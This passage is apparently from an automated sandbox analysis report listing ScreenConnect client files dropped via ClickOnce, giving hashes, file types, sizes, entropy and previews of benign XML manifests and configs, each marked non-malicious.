                                                                                                                                                                                                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                                                                                  Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                                  MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                                  SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                                  SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                                  SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):68096
                                                                                                                                                                                                                                                                  Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1636
                                                                                                                                                                                                                                                                  Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                                  MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                                  SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                                  SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                                  SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):95520
                                                                                                                                                                                                                                                                  Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):548864
                                                                                                                                                                                                                                                                  Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1216
                                                                                                                                                                                                                                                                  Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                                  MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                                  SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                                  SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                                  SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1721856
                                                                                                                                                                                                                                                                  Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1982
                                                                                                                                                                                                                                                                  Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                                  MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                                  SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                                  SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                                  SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):61216
                                                                                                                                                                                                                                                                  Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):601376
                                                                                                                                                                                                                                                                  Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2573
                                                                                                                                                                                                                                                                  Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                                  MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                                  SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                                  SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                                  SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):17866
                                                                                                                                                                                                                                                                  Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                                  MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                                  SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                                  SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                                  SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):81696
                                                                                                                                                                                                                                                                  Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):87
                                                                                                                                                                                                                                                                  Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                                  MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                                  SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                                  SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                                  SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
